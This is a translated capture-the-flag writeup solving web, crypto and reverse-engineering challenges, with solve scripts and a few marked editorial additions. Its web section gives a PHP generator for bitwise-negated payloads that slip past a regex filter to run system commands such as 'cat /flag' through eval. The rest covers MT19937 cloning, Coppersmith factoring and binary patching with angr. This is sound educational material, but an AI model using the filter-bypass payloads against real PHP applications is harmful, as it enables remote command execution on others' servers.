6.4 School Competition Writeup
Author: 互联网
School Competition
Happy to have placed; I still need to keep working hard. Regrettably I did not solve any misc challenge, so that area needs more time.
Web
入门 (Intro)
Press F12 to view the source and find the flag in the Network tab.
shell & shell_revenge
Both challenges share the same solution. Reading the PHP code, a regular expression filters out many characters. After some research I learned that bitwise negation does not trigger the regex; it is an original ctfshow challenge. Use the following PHP code:
<?php
fwrite(STDOUT,'[+]your function: ');
$system=str_replace(array("\r\n", "\r", "\n"), "", fgets(STDIN));
fwrite(STDOUT,'[+]your command: ');
$command=str_replace(array("\r\n", "\r", "\n"), "", fgets(STDIN));
echo '[*] (~'.urlencode(~$system).')(~'.urlencode(~$command).');';
?>
Run it from the command line: first enter system, then ls / to look around; pass the result to eval and the page echoes flag home. Then enter the command cat /flag, pass it to eval again, and you get the flag.
Crypto
贝斯手 (Bassist)
The challenge name hints at the Base family: decode with base64, base32, long_to_bytes, base85 and base58 in that order to get the flag.
from Crypto.Util.number import *
from base64 import *
import base58
cipher='R1EzVElOQlRHSTNVSU5aVUdRNERNTlpWR0UyREVOS0dHWTJES01aVUlZMkRHTkJSR1JCVE9OUlhHNDNFSU5CWUdSRERNUUpXR00yVElOQlNHUTNUTU1aV0dBMkRPTkJSR1laVE9OSldHQTNES01SV0dZMkRLTVJXSU0zRE9OSlFHVTRETVJCVUdRWlVHTVpVR1VaVE9SQlhJUTJETz09PQ=='
res=b64decode(cipher)                  # layer 1: base64
res=b32decode(res)                     # layer 2: base32
res=long_to_bytes(int(res,16))         # layer 3: hex digits -> integer -> bytes
res=b85decode(res)                     # layer 4: base85
res=base58.b58decode(res)              # layer 5: base58
print(res)
flag:scuctf{M4ny_k1nds_0f_13a5e!}
crypto1
Random-number prediction; there is a ready-made library for it. The 312 64-bit numbers have to be split into 624 32-bit numbers: the 32-bit outputs come in the order abcd while the 64-bit values hold them as badc, so the halves are taken in reverse. Note that padding is needed as well. Script:
from Crypto.Util.number import *
from randcrack import RandCrack
from Crypto.Cipher import AES

f = open("./test", 'rb')
rc = RandCrack()
for i in range(312):
    a = int(f.readline())
    a = bin(a)[2:].zfill(64)          # pad to a full 64 bits before splitting
    c = int('0b' + a[:32], 2)         # upper 32 bits
    b = int('0b' + a[32:], 2)         # lower 32 bits
    rc.submit(c)
    rc.submit(b)
f.close()
res = rc.predict_getrandbits(128)
key1 = long_to_bytes(res, 16)         # keep 16 bytes even if the value has leading zero bytes
res = open('./out', 'rb').read()
aes1 = AES.new(key1, AES.MODE_CBC, b"\x00"*16)
flag = aes1.decrypt(res)
print(flag)
# key2 is never defined in the original script; it is assumed here to be the
# following 128 predicted bits, for the case where the key was drawn one call later
key2 = long_to_bytes(rc.predict_getrandbits(128), 16)
aes2 = AES.new(key2, AES.MODE_CBC, b"\x00"*16)
flag = aes2.decrypt(res)
print(flag)
flag:scuctf{af0sd_f8}
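The same state recovery as the script above, done by hand instead of with randcrack, as an added example that is not part of the original writeup. It uses Python's own random module as the leaking generator, so the word order it relies on (CPython fills getrandbits(64) from the low word up) is checked by the code itself; the seed and the "AES key drawn next" scenario are constructed.

```python
import random

def untemper(y):
    """Invert MT19937's output tempering to recover one raw state word."""
    y ^= y >> 18                          # undo  y ^= y >> 18  (self-inverse)
    y ^= (y << 15) & 0xEFC60000           # undo  y ^= (y << 15) & 0xEFC60000
    x = y
    for _ in range(5):                    # undo  y ^= (y << 7) & 0x9D2C5680
        x = y ^ ((x << 7) & 0x9D2C5680)   # each pass fixes 7 more low bits
    y = x
    for _ in range(3):                    # undo  y ^= y >> 11
        x = y ^ (x >> 11)                 # each pass fixes 11 more high bits
    return x & 0xFFFFFFFF

def split64(values):
    """CPython builds getrandbits(64) from the least significant word up, so
    the first 32-bit MT output is the LOW half and the second is the HIGH half."""
    words = []
    for v in values:
        words.append(v & 0xFFFFFFFF)
        words.append(v >> 32)
    return words

def clone_mt(outputs64):
    """Rebuild a random.Random whose internal state matches the generator that
    produced exactly 312 consecutive getrandbits(64) outputs."""
    words = split64(outputs64)
    if len(words) != 624:
        raise ValueError("need 312 64-bit outputs (624 state words)")
    state = tuple(untemper(w) for w in words)
    clone = random.Random()
    clone.setstate((3, state + (624,), None))   # index 624: next call re-twists
    return clone

def demo(seed=1337):
    """Constructed scenario: a 'victim' generator leaks 312 64-bit values and
    then draws a 128-bit AES key; return whether the clone predicts that key."""
    victim = random.Random(seed)             # constructed seed, not from the challenge
    leaked = [victim.getrandbits(64) for _ in range(312)]
    clone = clone_mt(leaked)
    return clone.getrandbits(128) == victim.getrandbits(128)
```

The lesson for key generation is the usual one: 624 observed words of any MT19937 stream are enough to clone it, so keys must come from secrets or os.urandom, never from random.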
crypto2
A simple Coppersmith
p is 512 bits and x is 128 bits; set the leading element of x to 1. The condition then becomes that p_ is 1019 bits with its low 128 bits unknown, which the Coppersmith method solves. Multiplying the recovered p by 2^ex modulo n then gives the real p. Script:
'''sage
n = 85016144249518040150910227120120655178858680112497903474795846550337648959184474608344455198424753002209821827392389091448043545937173891641586356377876821641241033232828279439195610943286663032638048058568003136520988549470764306016674503217880123290623177055115638997384030786304744623796469032887028528817
e = 65537
c = 83724265903365973936178131138176403586796491037282811488797349096425411605088349291193550728134684573063610685342590513444340298881918101517014943046522979731970278182306111863948764449232289625176702192589838375986050458189860493609407060988207562417247647655585368569618561494059816502622854344519538215287
pbar = 4450463823628350893648746241337847373556196959762621885713665365237037340874488165755826348254697529157574566792939002187459776672801308978738078688091668148118673194644809701286264701999481650571431714684293423463355990167658855533422964048092514208406515703766237697665676941598677911363439038209842058509
kbits = 128
print("upper %d bits (of %d bits) is given" % (pbar.nbits()-kbits, pbar.nbits()))
PR.<x> = PolynomialRing(Zmod(n))
f = x + pbar
x0 = f.small_roots(X=2^kbits, beta=0.5)[0]
p = x0 + pbar
print(p)
'''
from Crypto.Util.number import *
import random
import gmpy2
from sympy import nextprime
leak=1145141920069                    # not used below
n= 85016144249518040150910227120120655178858680112497903474795846550337648959184474608344455198424753002209821827392389091448043545937173891641586356377876821641241033232828279439195610943286663032638048058568003136520988549470764306016674503217880123290623177055115638997384030786304744623796469032887028528817
c= 83724265903365973936178131138176403586796491037282811488797349096425411605088349291193550728134684573063610685342590513444340298881918101517014943046522979731970278182306111863948764449232289625176702192589838375986050458189860493609407060988207562417247647655585368569618561494059816502622854344519538215287
pbar=4450463823628350893648746241337847373556196959762621885713665365237037340874488165755826348254697529157574566792939002187459776672801308978738078688091668148118673194644809701286264701999481650571431714684293423463355990167658855533422964048092514208406515703766237697665676941598677911363439038209842058509
ex = 384
p_=4450463823628350893648746241337847373556196959762621885713665365237037340874488165755826348254697529157574566792939002187459776672801308978738078688091668148118673194644809701286264701999481650571431714684293423463355990167658855533422964048092514208406515703766237697896644308153471350247313227602240058029
p=p_*2**ex%n                          # p_ is the root from the Sage script above; real p = p_ * 2^ex mod n
q=n//p
phi=(p-1)*(q-1)
d=gmpy2.invert(65537,phi)
m=gmpy2.powmod(c,d,n)
print(long_to_bytes(m))
flag:scuctf{f05fe93d159b398fe25f280d94241261}
RE
ez_fps
A Unity game; it opens as a shooter. DIE identifies it as PE64.
Drop Assembly-CSharp.dll from the Managed folder into dnSpy64 and the flag is right there:
// Token: 0x0600003B RID: 59 RVA: 0x00003A20 File Offset: 0x00001C20
public static string TryGetFlag()
{
    if (Flag.score >= 100)
    {
        return "scuctf{AK47_b4d_PP_Bizon_g00d}";
    }
    return Flag.score.ToString();
}
pixel
SMC
Reads the colour value of the pixel at screen position (401,401) and uses it for SMC (self-modifying code).
The common function prologue
push ebp
mov ebp, esp
(bytes 55 8B EC) can be used as a clue: XOR those expected bytes with the encrypted bytes at the function start to derive the colour value backwards, after which the program outputs the flag directly:
0x61^0x55 = 0x34
0x8b^0xbb = 0x30
0xec^0xdd = 0x31
So:
313034h
Then run it to get the result:
scuctf{pixel!pixel!pixel!}
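The colour-value recovery above as an added example (not code from the original writeup): the expected prologue bytes 55 8B EC serve as known plaintext against the first encrypted bytes of the function. The encrypted sample function is constructed here, since the real binary's bytes are not on the page.

```python
PROLOGUE = bytes([0x55, 0x8B, 0xEC])     # push ebp; mov ebp, esp

def recover_key(encrypted_func, known=PROLOGUE):
    """Known-plaintext attack on the SMC layer: key byte = ciphertext ^ expected
    prologue byte at the same position (as many key bytes as known plaintext
    bytes, three here)."""
    return bytes(c ^ p for c, p in zip(encrypted_func[:len(known)], known))

def key_as_colour(key):
    """Pack the key bytes into the 24-bit colour value the writeup calls 313034h
    (little-endian: the first key byte is the least significant)."""
    return int.from_bytes(key, "little")

def xor_smc(code, key):
    """Apply the repeating-key XOR; the same call encrypts and decrypts."""
    return bytes(c ^ key[i % len(key)] for i, c in enumerate(code))

# Constructed sample: a tiny function body encrypted with key 34 30 31, so its
# first three encrypted bytes come out as 0x61, 0xBB, 0xDD as in the writeup.
PLAIN_FUNC = bytes.fromhex("558bec83ec10c9c3")   # push ebp; mov ebp,esp; sub esp,0x10; leave; ret
SAMPLE_ENCRYPTED = xor_smc(PLAIN_FUNC, bytes([0x34, 0x30, 0x31]))

def solve(encrypted_func):
    """Full chain: derive the key from the prologue, return the colour value and
    the decrypted bytes so the epilogue can be checked for sanity."""
    key = recover_key(encrypted_func)
    return key_as_colour(key), xor_smc(encrypted_func, key)
```

A short repeating XOR key over code gives no protection once any few bytes of plaintext are predictable, which every compiler-generated prologue is.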
rvm
A Ruby script implementing a nasty little VM
(clearly adapted from a CISCN challenge)
a = '''
20041
20161
20276
20334
20458
20514
20605
20798
20839
20984
21064
21163
21269
21314
21452
21586
21613
21778
21875
21987
22080
22165
22279
22369
22476
22502
22676
'''
b = [41,61,76,34,58,14,5,98,39,84,64,63,69,14,52,86,13,78,75,87,80,65,79,69,76,2,76]
c = [93,88,52,69,67,98,135,24,89,56,196,84,123,143,90,223,76,201,206,36,43,201,7,14,203,124,212]
d = [b[i]^c[i] for i in range(27)]          # XOR the two operand tables
e = [chr(d[i]-i-1) for i in range(27)]      # then undo the position-dependent offset
for i in e:
    print(i, end='')
#scuctf{ruby_1s_y0ur_fr13nd}
baby_maze
A maze challenge, but a somewhat complicated one: there are 100 maze functions, each padded with lots of useless sequences like
push rax
rdrand rax
pop rax
Without further ado, I wrote a script to patch them out,
then let angr do the rest.
Patch script:
#!/usr/bin/env python
# NOP out every "push rax; rdrand rax; pop rax" sequence (bytes 50 48 0F C7 F0 58)
with open("baby_maze", "rb") as f:
    binary = f.read()
list_binary = list(binary)
for i in range(len(binary) - 5):        # leave room for the 6-byte lookahead
    if binary[i] == 0x50:
        if binary[i+1] == 0x48 and binary[i+2] == 0x0F and binary[i+3] == 0xC7 and binary[i+4] == 0xF0 :
            if binary[i+5] == 0x58:
                for k in range(6):       # overwrite all six bytes with NOP (0x90)
                    list_binary[i+k] = 0x90
with open("baby_maze_altered", "wb") as ff:
    ff.write(bytes(list_binary))
Then angr does the rest in one go:
import angr
p=angr.Project("baby_maze")
ff = open("flag.txt", "w")
for i in range(0,100):
    # the 100 maze functions are 0x16 bytes apart; start a blank state at each entry
    state=p.factory.blank_state(addr=0xa6aac+0x400000+i*0x16)
    #state.stack_push(state.regs.rbp)
    #state.regs.rbp = state.regs.rsp
    sm=p.factory.simgr(state)
    sm.explore(find=0xa6ace+0x400000+i*0x16)   # target address for maze i
    if sm.found:
        fs = sm.found[0]
        print(fs.posix.dumps(0))                # the stdin that reaches the target
        ff.write(fs.posix.dumps(0).decode())
        #print(fs.posix.dumps(1))
    else:
        print("no")
ff.close()
Source: https://blog.csdn.net/shikaku_/article/details/117622087